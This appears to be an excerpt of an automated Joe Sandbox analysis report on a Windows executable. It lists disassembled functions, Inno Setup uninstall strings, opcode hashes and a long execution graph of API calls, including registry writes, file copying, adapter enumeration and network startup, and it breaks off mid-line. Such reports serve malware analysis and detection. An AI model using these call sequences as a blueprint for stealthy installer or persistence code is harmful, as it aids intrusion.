                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$EnumQuery
                                                                                                      • String ID: Inno Setup: No Icons
                                                                                                      • API String ID: 1576479698-2016326496
                                                                                                      • Opcode ID: e0e38617d7780f69d75f26860b1501b2527d54a68fe4bf3310a8a6dfd5a7631c
                                                                                                      • Instruction ID: 05ef73584c9e0c756a5fead926ccd29af3c260b6948a855c27afe474e1c18ecb
                                                                                                      • Opcode Fuzzy Hash: e0e38617d7780f69d75f26860b1501b2527d54a68fe4bf3310a8a6dfd5a7631c
                                                                                                      • Instruction Fuzzy Hash: B2012B36F5A77179F73046256D02BBB56888B82B60F68453BF940EA2C0D6589C04C36E
                                                                                                      Function 00497234 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 004555D0: GetCurrentProcess.KERNEL32(00000028), ref: 004555DF
                                                                                                        • Part of subcall function 004555D0: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555E5
                                                                                                      • SetForegroundWindow.USER32(?), ref: 00497266
                                                                                                      Strings
                                                                                                      • Restarting Windows., xrefs: 00497243
                                                                                                      • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 00497291
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                                                      • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                                                      • API String ID: 3179053593-4147564754
                                                                                                      • Opcode ID: 699fd1f27132e499a72d678966239612eac8b61dfe9d57f4c88cf0c32b356d0f
                                                                                                      • Instruction ID: f042dff5c045186d33be5417afa4f05d679b9763972d2bb00463d131ea403ed4
                                                                                                      • Opcode Fuzzy Hash: 699fd1f27132e499a72d678966239612eac8b61dfe9d57f4c88cf0c32b356d0f
                                                                                                      • Instruction Fuzzy Hash: FD01D8706282406BEB00EB65E981B9C3F99AB5430CF5040BBF900A72D3D73C9945871D
                                                                                                      Function 004979D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0047CD84: FreeLibrary.KERNEL32(74600000,004814B7), ref: 0047CD9A
                                                                                                        • Part of subcall function 0047CA54: GetTickCount.KERNEL32 ref: 0047CA9E
                                                                                                        • Part of subcall function 004570CC: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004570EB
                                                                                                      • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049832B), ref: 00497A29
                                                                                                      • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049832B), ref: 00497A2F
                                                                                                      Strings
                                                                                                      • Detected restart. Removing temporary directory., xrefs: 004979E3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                                      • String ID: Detected restart. Removing temporary directory.
                                                                                                      • API String ID: 1717587489-3199836293
                                                                                                      • Opcode ID: e611eeaa9fed28cadb8c69ef2edffd8a52967f1f4ce985551ff58b7f7fd4f302
                                                                                                      • Instruction ID: 93f06bea8fcfa1b224d7ac257058da4e76460d04d1e35911cc499d3d1c0dfa98
                                                                                                      • Opcode Fuzzy Hash: e611eeaa9fed28cadb8c69ef2edffd8a52967f1f4ce985551ff58b7f7fd4f302
                                                                                                      • Instruction Fuzzy Hash: 51E0553120C3002EDA02B7B2BC52A2F7F8CD701728311083BF40882452C43D1810C77D
                                                                                                      Function 00455660 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1458359878-0
                                                                                                      • Opcode ID: 11e49af8eca5aab8e77903997d46822470632a6293514e89f51700c73713890d
                                                                                                      • Instruction ID: a2606c7dd4c17da0a3c90c20a229de96912268129783a4208f21052e6a4fbdd3
                                                                                                      • Opcode Fuzzy Hash: 11e49af8eca5aab8e77903997d46822470632a6293514e89f51700c73713890d
                                                                                                      • Instruction Fuzzy Hash: 62F02436B01D64578F20A59E998193F63DDEA94376750013BFC0CDB303D438CC098AA9

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:11.7%
                                                                                                      Dynamic/Decrypted Code Coverage:83.4%
                                                                                                      Signature Coverage:3.2%
                                                                                                      Total number of Nodes:2000
                                                                                                      Total number of Limit Nodes:43
                                                                                                      execution_graph 18939 40d440 18940 40d1b6 18939->18940 18941 40d456 RegCloseKey 18940->18941 18942 40d44f 18940->18942 18941->18942 21637 2bfe01e 21638 2bfe023 21637->21638 21642 2bcf97d LoadLibraryA 21638->21642 21639 2c08c16 21641 2bcf97d 64 API calls 21639->21641 21641->21639 21643 2bcf9a6 GetProcAddress 21642->21643 21644 2bcfa60 21642->21644 21645 2bcfa59 FreeLibrary 21643->21645 21648 2bcf9ba 21643->21648 21644->21639 21645->21644 21646 2bcf9cc GetAdaptersInfo 21646->21648 21647 2bcfa54 21647->21645 21648->21646 21648->21647 21648->21648 21649 2bd3b2c _Allocate 60 API calls 21648->21649 21649->21648 18943 402342 18944 402810 CopyFileA 18943->18944 18946 40d601 18944->18946 18947 40d243 18948 40d5c1 RegSetValueExA RegCloseKey 18947->18948 18949 40d5d0 18948->18949 18950 2c09483 18951 2c22bcc Sleep 18950->18951 21650 401f64 FindResourceA 21651 401f86 GetLastError SizeofResource 21650->21651 21656 401f9f 21650->21656 21652 401fa6 LoadResource LockResource GlobalAlloc 21651->21652 21651->21656 21653 401fd2 21652->21653 21654 401ffb GetTickCount 21653->21654 21657 402005 GlobalAlloc 21654->21657 21657->21656 21658 402865 21659 40d62b Sleep 21658->21659 21660 40d697 21659->21660 18953 40220b CreateDirectoryA 18954 40227e 18953->18954 18955 40230d RegOpenKeyExA 18956 40231b 18955->18956 18956->18956 21661 40276d 21662 402774 RegQueryValueExA 21661->21662 21664 40d1b6 21662->21664 21665 40d456 RegCloseKey 21664->21665 21666 40d44f 21664->21666 21665->21666 21667 40222f 21670 4021e4 21667->21670 21668 40d026 GetLastError 21669 40d9d4 21668->21669 21670->21668 21671 40d31a 21670->21671 21672 402eb0 GetVersion 21696 403ff4 HeapCreate 21672->21696 21674 402f0f 21675 402f14 21674->21675 21676 402f1c 21674->21676 21771 402fcb 21675->21771 21708 403cd4 21676->21708 21680 402f24 GetCommandLineA 21722 403ba2 21680->21722 21684 402f3e 21754 40389c 21684->21754 21686 402f43 21687 402f48 GetStartupInfoA 21686->21687 21767 403844 21687->21767 21689 402f5a GetModuleHandleA 21691 402f7e 21689->21691 21777 4035eb 21691->21777 21695 402f98 21697 404014 21696->21697 21698 40404a 21696->21698 21784 403eac 21697->21784 21698->21674 21701 404030 21704 40404d 21701->21704 21705 404c1c 5 API calls 21701->21705 21702 404023 21796 4043cb HeapAlloc 21702->21796 21704->21674 21706 40402d 21705->21706 21706->21704 21707 40403e HeapDestroy 21706->21707 21707->21698 21852 402fef 21708->21852 21711 403cf3 GetStartupInfoA 21714 403e04 21711->21714 21721 403d3f 21711->21721 21715 403e2b GetStdHandle 21714->21715 21716 403e6b SetHandleCount 21714->21716 21715->21714 21718 403e39 GetFileType 21715->21718 21716->21680 21717 402fef 12 API calls 21717->21721 21718->21714 21719 403db0 21719->21714 21720 403dd2 GetFileType 21719->21720 21720->21719 21721->21714 21721->21717 21721->21719 21723 403bf0 21722->21723 21724 403bbd GetEnvironmentStringsW 21722->21724 21725 403bc5 21723->21725 21726 403be1 21723->21726 21724->21725 21727 403bd1 GetEnvironmentStrings 21724->21727 21729 403c09 WideCharToMultiByte 21725->21729 21730 403bfd GetEnvironmentStringsW 21725->21730 21728 402f34 21726->21728 21731 403c83 GetEnvironmentStrings 21726->21731 21732 403c8f 21726->21732 21727->21726 21727->21728 21745 403955 21728->21745 21734 403c3d 21729->21734 21735 403c6f FreeEnvironmentStringsW 21729->21735 21730->21728 21730->21729 21731->21728 21731->21732 21736 402fef 12 API calls 21732->21736 21737 402fef 12 API calls 21734->21737 21735->21728 21743 403caa 21736->21743 21738 403c43 21737->21738 21738->21735 21739 403c4c WideCharToMultiByte 21738->21739 21741 403c66 21739->21741 21742 403c5d 21739->21742 21740 403cc0 FreeEnvironmentStringsA 21740->21728 21741->21735 21744 4030a1 7 API calls 21742->21744 21743->21740 21744->21741 21746 403967 21745->21746 21747 40396c GetModuleFileNameA 21745->21747 21881 4061b4 21746->21881 21749 40398f 21747->21749 21750 402fef 12 API calls 21749->21750 21751 4039b0 21750->21751 21752 4039c0 21751->21752 21753 402fa6 7 API calls 21751->21753 21752->21684 21753->21752 21755 4038a9 21754->21755 21757 4038ae 21754->21757 21756 4061b4 19 API calls 21755->21756 21756->21757 21758 402fef 12 API calls 21757->21758 21759 4038db 21758->21759 21760 402fa6 7 API calls 21759->21760 21765 4038ef 21759->21765 21760->21765 21761 4030a1 7 API calls 21762 40393e 21761->21762 21762->21686 21763 402fef 12 API calls 21763->21765 21764 403932 21764->21761 21765->21763 21765->21764 21766 402fa6 7 API calls 21765->21766 21766->21765 21768 40384d 21767->21768 21770 403852 21767->21770 21769 4061b4 19 API calls 21768->21769 21769->21770 21770->21689 21772 402fd4 21771->21772 21773 402fd9 21771->21773 21774 404224 7 API calls 21772->21774 21775 40425d 7 API calls 21773->21775 21774->21773 21776 402fe2 ExitProcess 21775->21776 21905 40360d 21777->21905 21780 4036c0 21781 4036cc 21780->21781 21782 4037f5 UnhandledExceptionFilter 21781->21782 21783 4036e0 21781->21783 21782->21783 21783->21695 21783->21783 21798 402d40 21784->21798 21787 403ed5 21788 403eef GetEnvironmentVariableA 21787->21788 21789 403ee7 21787->21789 21791 403f0e 21788->21791 21795 403fcc 21788->21795 21789->21701 21789->21702 21792 403f53 GetModuleFileNameA 21791->21792 21793 403f4b 21791->21793 21792->21793 21793->21795 21800 4061d0 21793->21800 21795->21789 21803 403e7f GetModuleHandleA 21795->21803 21797 4043e7 21796->21797 21797->21706 21799 402d4c GetVersionExA 21798->21799 21799->21787 21799->21788 21805 4061e7 21800->21805 21804 403e96 21803->21804 21804->21789 21807 4061ff 21805->21807 21809 40622f 21807->21809 21812 4053a6 21807->21812 21808 4053a6 6 API calls 21808->21809 21809->21808 21811 4061e3 21809->21811 21816 4073ab 21809->21816 21811->21795 21813 4053b8 21812->21813 21814 4053c4 21812->21814 21813->21807 21822 40670e 21814->21822 21817 4073d6 21816->21817 21820 4073b9 21816->21820 21818 4053a6 6 API calls 21817->21818 21819 4073f2 21817->21819 21818->21819 21819->21820 21834 406857 21819->21834 21820->21809 21823 406757 21822->21823 21824 40673f GetStringTypeW 21822->21824 21825 406782 GetStringTypeA 21823->21825 21826 4067a6 21823->21826 21824->21823 21827 40675b GetStringTypeA 21824->21827 21829 406843 21825->21829 21826->21829 21830 4067bc MultiByteToWideChar 21826->21830 21827->21823 21827->21829 21829->21813 21830->21829 21831 4067e0 21830->21831 21831->21829 21832 40681a MultiByteToWideChar 21831->21832 21832->21829 21833 406833 GetStringTypeW 21832->21833 21833->21829 21835 406887 LCMapStringW 21834->21835 21836 4068a3 21834->21836 21835->21836 21837 4068ab LCMapStringA 21835->21837 21838 406909 21836->21838 21839 4068ec LCMapStringA 21836->21839 21837->21836 21840 4069e5 21837->21840 21838->21840 21841 40691f MultiByteToWideChar 21838->21841 21839->21840 21840->21820 21841->21840 21842 406949 21841->21842 21842->21840 21843 40697f MultiByteToWideChar 21842->21843 21843->21840 21844 406998 LCMapStringW 21843->21844 21844->21840 21845 4069b3 21844->21845 21846 4069b9 21845->21846 21848 4069f9 21845->21848 21846->21840 21847 4069c7 LCMapStringW 21846->21847 21847->21840 21848->21840 21849 406a31 LCMapStringW 21848->21849 21849->21840 21850 406a49 WideCharToMultiByte 21849->21850 21850->21840 21853 403001 12 API calls 21852->21853 21854 402ffe 21853->21854 21854->21711 21855 402fa6 21854->21855 21856 402fb4 21855->21856 21857 402faf 21855->21857 21867 40425d 21856->21867 21861 404224 21857->21861 21862 40422e 21861->21862 21863 40425b 21862->21863 21864 40425d 7 API calls 21862->21864 21863->21856 21865 404245 21864->21865 21866 40425d 7 API calls 21865->21866 21866->21863 21870 404270 21867->21870 21868 402fbd 21868->21711 21869 404387 21873 40439a GetStdHandle WriteFile 21869->21873 21870->21868 21870->21869 21871 4042b0 21870->21871 21871->21868 21872 4042bc GetModuleFileNameA 21871->21872 21874 4042d4 21872->21874 21873->21868 21876 406578 21874->21876 21877 406585 LoadLibraryA 21876->21877 21879 4065c7 21876->21879 21878 406596 GetProcAddress 21877->21878 21877->21879 21878->21879 21880 4065ad GetProcAddress GetProcAddress 21878->21880 21879->21868 21880->21879 21882 4061bd 21881->21882 21883 4061c4 21881->21883 21885 405df0 21882->21885 21883->21747 21892 405f89 21885->21892 21887 405f7d 21887->21883 21890 405e33 GetCPInfo 21891 405e47 21890->21891 21891->21887 21897 40602f GetCPInfo 21891->21897 21893 405fa9 21892->21893 21894 405f99 GetOEMCP 21892->21894 21895 405e01 21893->21895 21896 405fae GetACP 21893->21896 21894->21893 21895->21887 21895->21890 21895->21891 21896->21895 21898 40611a 21897->21898 21902 406052 21897->21902 21898->21887 21899 40670e 6 API calls 21900 4060ce 21899->21900 21901 406857 9 API calls 21900->21901 21903 4060f2 21901->21903 21902->21899 21904 406857 9 API calls 21903->21904 21904->21898 21906 403619 GetCurrentProcess TerminateProcess 21905->21906 21907 40362a 21905->21907 21906->21907 21908 402f87 21907->21908 21909 403694 ExitProcess 21907->21909 21908->21780 21910 2bc104d 21911 2bd3384 __cinit 68 API calls 21910->21911 21912 2bc1057 21911->21912 21915 2bc1aa9 InterlockedIncrement 21912->21915 21916 2bc105c 21915->21916 21917 2bc1ac5 WSAStartup InterlockedExchange 21915->21917 21917->21916 18957 2bd3cef 18958 2bd3cfd 18957->18958 18959 2bd3cf8 18957->18959 18963 2bd3d12 18958->18963 18971 2bdb8c1 18959->18971 18962 2bd3d0b 18964 2bd3d1e __mtinitlocknum 18963->18964 18968 2bd3d6c ___DllMainCRTStartup 18964->18968 18970 2bd3dc9 __mtinitlocknum 18964->18970 18975 2bd3b7d 18964->18975 18966 2bd3da6 18967 2bd3b7d __CRT_INIT@12 138 API calls 18966->18967 18966->18970 18967->18970 18968->18966 18969 2bd3b7d __CRT_INIT@12 138 API calls 18968->18969 18968->18970 18969->18966 18970->18962 18972 2bdb8e4 18971->18972 18973 2bdb8f1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 18971->18973 18972->18973 18974 2bdb8e8 18972->18974 18973->18974 18974->18958 18976 2bd3b89 __mtinitlocknum 18975->18976 18977 2bd3c0b 18976->18977 18978 2bd3b91 18976->18978 18980 2bd3c0f 18977->18980 18981 2bd3c74 18977->18981 19023 2bd81c6 GetProcessHeap 18978->19023 18985 2bd3c30 18980->18985 19016 2bd3b9a __mtinitlocknum __CRT_INIT@12 18980->19016 19124 2bd843b 18980->19124 18982 2bd3c79 18981->18982 18983 2bd3cd7 18981->18983 19155 2bd91ab 18982->19155 18983->19016 19183 2bd5c04 18983->19183 18984 2bd3b96 18984->19016 19024 2bd5d74 18984->19024 19127 2bd8312 RtlDecodePointer 18985->19127 18990 2bd3c84 18990->19016 19158 2bd8a4c 18990->19158 18992 2bd3ba6 __RTC_Initialize 19000 2bd3bb6 GetCommandLineA 18992->19000 18992->19016 18995 2bd3c46 __CRT_INIT@12 19151 2bd3c5f 18995->19151 18997 2bdb55f __ioterm 60 API calls 18999 2bd3c41 18997->18999 19002 2bd5dea __mtterm 62 API calls 18999->19002 19045 2bdb95d GetEnvironmentStringsW 19000->19045 19002->18995 19004 2bd3cad 19006 2bd3ccb 19004->19006 19007 2bd3cb3 19004->19007 19177 2bd2f54 19006->19177 19167 2bd5cc1 19007->19167 19011 2bd3bd0 19013 2bd3bd4 19011->19013 19077 2bdb5b1 19011->19077 19012 2bd3cbb GetCurrentThreadId 19012->19016 19110 2bd5dea 19013->19110 19016->18968 19018 2bd3bf4 19018->19016 19119 2bdb55f 19018->19119 19023->18984 19191 2bd84e2 RtlEncodePointer 19024->19191 19026 2bd5d79 19196 2bd89fe 19026->19196 19029 2bd5d82 19030 2bd5dea __mtterm 62 API calls 19029->19030 19032 2bd5d87 19030->19032 19032->18992 19034 2bd5d9f 19035 2bd8a4c __calloc_crt 59 API calls 19034->19035 19036 2bd5dac 19035->19036 19037 2bd5de1 19036->19037 19038 2bd91ca __getptd_noexit TlsSetValue 19036->19038 19039 2bd5dea __mtterm 62 API calls 19037->19039 19041 2bd5dc0 19038->19041 19040 2bd5de6 19039->19040 19040->18992 19041->19037 19042 2bd5dc6 19041->19042 19043 2bd5cc1 __initptd 59 API calls 19042->19043 19044 2bd5dce GetCurrentThreadId 19043->19044 19044->18992 19046 2bd3bc6 19045->19046 19047 2bdb970 WideCharToMultiByte 19045->19047 19058 2bdb2ab 19046->19058 19049 2bdb9da FreeEnvironmentStringsW 19047->19049 19050 2bdb9a3 19047->19050 19049->19046 19207 2bd8a94 19050->19207 19053 2bdb9b0 WideCharToMultiByte 19054 2bdb9cf FreeEnvironmentStringsW 19053->19054 19055 2bdb9c6 19053->19055 19054->19046 19056 2bd2f54 _free 59 API calls 19055->19056 19057 2bdb9cc 19056->19057 19057->19054 19059 2bdb2b7 __mtinitlocknum 19058->19059 19060 2bd88cd __lock 59 API calls 19059->19060 19061 2bdb2be 19060->19061 19062 2bd8a4c __calloc_crt 59 API calls 19061->19062 19063 2bdb2cf 19062->19063 19064 2bdb33a GetStartupInfoW 19063->19064 19065 2bdb2da __mtinitlocknum @_EH4_CallFilterFunc@8 19063->19065 19071 2bdb34f 19064->19071 19074 2bdb47e 19064->19074 19065->19011 19066 2bdb546 19457 2bdb556 19066->19457 19068 2bd8a4c __calloc_crt 59 API calls 19068->19071 19069 2bdb4cb GetStdHandle 19069->19074 19070 2bdb4de GetFileType 19070->19074 19071->19068 19072 2bdb39d 19071->19072 19071->19074 19073 2bdb3d1 GetFileType 19072->19073 19072->19074 19075 2bd91ec __mtinitlocknum InitializeCriticalSectionAndSpinCount 19072->19075 19073->19072 19074->19066 19074->19069 19074->19070 19076 2bd91ec __mtinitlocknum InitializeCriticalSectionAndSpinCount 19074->19076 19075->19072 19076->19074 19078 2bdb5bf 19077->19078 19079 2bdb5c4 GetModuleFileNameA 19077->19079 19467 2bd526a 19078->19467 19081 2bdb5f1 19079->19081 19461 2bdb664 19081->19461 19084 2bd8a94 __malloc_crt 59 API calls 19085 2bdb62a 19084->19085 19086 2bdb664 _parse_cmdline 59 API calls 19085->19086 19087 2bd3be0 19085->19087 19086->19087 19087->19018 19088 2bdb7e0 19087->19088 19089 2bdb7e9 19088->19089 19092 2bdb7ee _strlen 19088->19092 19091 2bd526a ___initmbctable 71 API calls 19089->19091 19090 2bd3be9 19090->19018 19104 2bd844a 19090->19104 19091->19092 19092->19090 19093 2bd8a4c __calloc_crt 59 API calls 19092->19093 19095 2bdb824 _strlen 19093->19095 19094 2bd2f54 _free 59 API calls 19094->19090 19095->19090 19096 2bd8a4c __calloc_crt 59 API calls 19095->19096 19097 2bdb876 19095->19097 19098 2bdb89d 19095->19098 19101 2bdb8b4 19095->19101 19671 2bd6c9c 19095->19671 19096->19095 19097->19094 19100 2bd2f54 _free 59 API calls 19098->19100 19100->19090 19102 2bd4ee5 __invoke_watson 8 API calls 19101->19102 19103 2bdb8c0 19102->19103 19105 2bd8456 __IsNonwritableInCurrentImage 19104->19105 19680 2bdd2bf 19105->19680 19107 2bd8474 __initterm_e 19109 2bd8493 _doexit __IsNonwritableInCurrentImage 19107->19109 19683 2bd3384 19107->19683 19109->19018 19111 2bd5df4 19110->19111 19113 2bd5dfa 19110->19113 19749 2bd918c 19111->19749 19114 2bd8933 19113->19114 19115 2bd8917 RtlDeleteCriticalSection 19113->19115 19117 2bd893f RtlDeleteCriticalSection 19114->19117 19118 2bd8952 19114->19118 19116 2bd2f54 _free 59 API calls 19115->19116 19116->19113 19117->19114 19118->19016 19121 2bdb566 19119->19121 19120 2bdb5ae 19120->19013 19121->19120 19122 2bd2f54 _free 59 API calls 19121->19122 19123 2bdb57f RtlDeleteCriticalSection 19121->19123 19122->19121 19123->19121 19125 2bd8584 _doexit 59 API calls 19124->19125 19126 2bd8446 19125->19126 19126->18985 19128 2bd832c 19127->19128 19129 2bd833e 19127->19129 19128->19129 19131 2bd2f54 _free 59 API calls 19128->19131 19130 2bd2f54 _free 59 API calls 19129->19130 19132 2bd834b 19130->19132 19131->19128 19133 2bd836f 19132->19133 19136 2bd2f54 _free 59 API calls 19132->19136 19134 2bd2f54 _free 59 API calls 19133->19134 19135 2bd837b 19134->19135 19137 2bd2f54 _free 59 API calls 19135->19137 19136->19132 19138 2bd838c 19137->19138 19139 2bd2f54 _free 59 API calls 19138->19139 19140 2bd8397 19139->19140 19141 2bd83bc RtlEncodePointer 19140->19141 19145 2bd2f54 _free 59 API calls 19140->19145 19142 2bd83d7 19141->19142 19143 2bd83d1 19141->19143 19144 2bd83ed 19142->19144 19147 2bd2f54 _free 59 API calls 19142->19147 19146 2bd2f54 _free 59 API calls 19143->19146 19148 2bd3c35 19144->19148 19150 2bd2f54 _free 59 API calls 19144->19150 19149 2bd83bb 19145->19149 19146->19142 19147->19144 19148->18995 19148->18997 19149->19141 19150->19148 19152 2bd3c71 19151->19152 19153 2bd3c63 19151->19153 19152->19016 19153->19152 19154 2bd5dea __mtterm 62 API calls 19153->19154 19154->19152 19156 2bd91be 19155->19156 19157 2bd91c2 TlsGetValue 19155->19157 19156->18990 19157->18990 19161 2bd8a53 19158->19161 19160 2bd3c95 19160->19016 19164 2bd91ca 19160->19164 19161->19160 19163 2bd8a71 19161->19163 19752 2be0498 19161->19752 19163->19160 19163->19161 19760 2bd94e5 Sleep 19163->19760 19165 2bd91e4 TlsSetValue 19164->19165 19166 2bd91e0 19164->19166 19165->19004 19166->19004 19168 2bd5ccd __mtinitlocknum 19167->19168 19169 2bd88cd __lock 59 API calls 19168->19169 19170 2bd5d0a 19169->19170 19761 2bd5d62 19170->19761 19173 2bd88cd __lock 59 API calls 19174 2bd5d2b ___addlocaleref 19173->19174 19764 2bd5d6b 19174->19764 19176 2bd5d56 __mtinitlocknum 19176->19012 19178 2bd2f5d HeapFree 19177->19178 19179 2bd2f86 __dosmaperr 19177->19179 19178->19179 19180 2bd2f72 19178->19180 19179->19016 19181 2bd5e3b __chsize_nolock 57 API calls 19180->19181 19182 2bd2f78 GetLastError 19181->19182 19182->19179 19184 2bd5c11 19183->19184 19190 2bd5c37 19183->19190 19186 2bd91ab __getptd_noexit TlsGetValue 19184->19186 19188 2bd5c1f 19184->19188 19185 2bd91ca __getptd_noexit TlsSetValue 19187 2bd5c2f 19185->19187 19186->19188 19769 2bd5acf 19187->19769 19188->19185 19190->19016 19192 2bd84f3 __init_pointers __initp_misc_winsig 19191->19192 19203 2bd39e7 RtlEncodePointer 19192->19203 19194 2bd850b __init_pointers 19195 2bd925a 34 API calls 19194->19195 19195->19026 19197 2bd8a0a 19196->19197 19199 2bd5d7e 19197->19199 19204 2bd91ec 19197->19204 19199->19029 19200 2bd916e 19199->19200 19201 2bd5d94 19200->19201 19202 2bd9185 TlsAlloc 19200->19202 19201->19029 19201->19034 19203->19194 19205 2bd91fc 19204->19205 19206 2bd9209 InitializeCriticalSectionAndSpinCount 19204->19206 19205->19197 19206->19197 19209 2bd8aa2 19207->19209 19210 2bd8ad4 19209->19210 19212 2bd2f8c 19209->19212 19229 2bd94e5 Sleep 19209->19229 19210->19049 19210->19053 19213 2bd3007 19212->19213 19220 2bd2f98 19212->19220 19214 2bd81e3 _malloc RtlDecodePointer 19213->19214 19215 2bd300d 19214->19215 19217 2bd5e3b __chsize_nolock 58 API calls 19215->19217 19228 2bd2fff 19217->19228 19218 2bd2fcb RtlAllocateHeap 19218->19220 19218->19228 19220->19218 19221 2bd2fa3 19220->19221 19222 2bd2ff3 19220->19222 19226 2bd2ff1 19220->19226 19277 2bd81e3 RtlDecodePointer 19220->19277 19221->19220 19230 2bd86b3 19221->19230 19239 2bd8710 19221->19239 19274 2bd82fc 19221->19274 19279 2bd5e3b 19222->19279 19227 2bd5e3b __chsize_nolock 58 API calls 19226->19227 19227->19228 19228->19209 19229->19209 19282 2be015e 19230->19282 19232 2bd86ba 19233 2bd86c7 19232->19233 19234 2be015e __NMSG_WRITE 59 API calls 19232->19234 19235 2bd8710 __NMSG_WRITE 59 API calls 19233->19235 19237 2bd86e9 19233->19237 19234->19233 19236 2bd86df 19235->19236 19238 2bd8710 __NMSG_WRITE 59 API calls 19236->19238 19237->19221 19238->19237 19240 2bd872e __NMSG_WRITE 19239->19240 19241 2be015e __NMSG_WRITE 55 API calls 19240->19241 19273 2bd8855 19240->19273 19243 2bd8741 19241->19243 19245 2bd885a GetStdHandle 19243->19245 19246 2be015e __NMSG_WRITE 55 API calls 19243->19246 19244 2bd88be 19244->19221 19249 2bd8868 _strlen 19245->19249 19245->19273 19247 2bd8752 19246->19247 19247->19245 19248 2bd8764 19247->19248 19248->19273 19304 2bdf51d 19248->19304 19251 2bd88a1 WriteFile 19249->19251 19249->19273 19251->19273 19253 2bd8791 GetModuleFileNameW 19255 2bd87b1 19253->19255 19260 2bd87c1 __NMSG_WRITE 19253->19260 19254 2bd88c2 19256 2bd4ee5 __invoke_watson 8 API calls 19254->19256 19257 2bdf51d __NMSG_WRITE 55 API calls 19255->19257 19258 2bd88cc 19256->19258 19257->19260 19259 2bd88f1 RtlEnterCriticalSection 19258->19259 19363 2bd8955 19258->19363 19259->19221 19260->19254 19261 2bd8807 19260->19261 19313 2bdf592 19260->19313 19261->19254 19322 2bdf4b1 19261->19322 19264 2bd88e4 19264->19259 19385 2bd841f 19264->19385 19268 2bdf4b1 __NMSG_WRITE 55 API calls 19269 2bd883e 19268->19269 19269->19254 19271 2bd8845 19269->19271 19331 2be019e RtlEncodePointer 19271->19331 19356 2bd452b 19273->19356 19440 2bd82c8 GetModuleHandleExW 19274->19440 19278 2bd81f6 19277->19278 19278->19220 19443 2bd5c52 GetLastError 19279->19443 19281 2bd5e40 19281->19226 19283 2be0168 19282->19283 19284 2bd5e3b __chsize_nolock 59 API calls 19283->19284 19285 2be0172 19283->19285 19286 2be018e 19284->19286 19285->19232 19289 2bd4ed5 19286->19289 19292 2bd4eaa RtlDecodePointer 19289->19292 19293 2bd4ebd 19292->19293 19298 2bd4ee5 IsProcessorFeaturePresent 19293->19298 19296 2bd4eaa __write_nolock 8 API calls 19297 2bd4ee1 19296->19297 19297->19232 19299 2bd4ef0 19298->19299 19300 2bd4d78 __call_reportfault 7 API calls 19299->19300 19301 2bd4f05 19300->19301 19302 2bd94f3 __invoke_watson GetCurrentProcess TerminateProcess 19301->19302 19303 2bd4ed4 19302->19303 19303->19296 19305 2bdf528 19304->19305 19306 2bdf536 19304->19306 19305->19306 19311 2bdf54f 19305->19311 19307 2bd5e3b __chsize_nolock 59 API 